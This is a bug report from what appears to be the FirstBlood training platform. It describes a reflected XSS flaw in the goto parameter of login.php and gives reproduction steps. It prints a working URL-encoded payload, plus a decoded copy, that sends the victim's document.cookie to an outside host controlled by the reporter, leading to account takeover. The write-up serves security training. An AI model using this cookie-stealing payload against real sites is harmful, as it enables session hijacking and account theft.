FirstBlood-#477 — Reflected XSS on /login.php via goto parameter leads to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-25, 0xblackbird reported:
Hello! I've found out that the exact same issue I reported before is still there and remained unpatched. Below are the steps to reproduce the issue.
Proof of concept url:
Account Takeover: https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=xyz%22%3E%3Cx/autofocus/contenteditable/onfocusin=%22document.location=%27//0xblackbird.github.io/home?cookies=%27%2Bdocument.cookie%22%3E
Steps to reproduce:
- As from your methodology, you said that parameters often get reused which is the case here. The goto parameter gets reused and when we view the source code of the following web page https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=xyz, we can see that when we append the goto parameter to the URL, a new hidden input field gets added.
- We can also see that the value of the goto parameter gets reflected and that the most common special characters (such as
>) do not get handled safely. This indicates that we can breakout of the tag easily and inject our own. Visit https://9a82ae1431a9-0xblackbird.a.firstbloodhackers.com/login.php?goto=xyz"x> and view the source code of the web page.
- Knowing that we can inject our own html tags, attributes and event handlers, we can easily craft a little payload that bypasses some of the basic filters:
- As mentioned in the title of this report, we can escalate this to account takeover by stealing the user's cookies. To do so, we just have to adjust our payload a bit:
xyz"><x/autofocus/contenteditable/onfocusin="document.location='//0xblackbird.github.io/home?cookies='+document.cookie">(make sure to url encode the payload to avoid any errors). After getting redirected, we can see our cookies end up in the cookie parameter, this can be accessed by the attacker by reading for example server logs.
Thanks! Have a nice day!
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (
ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.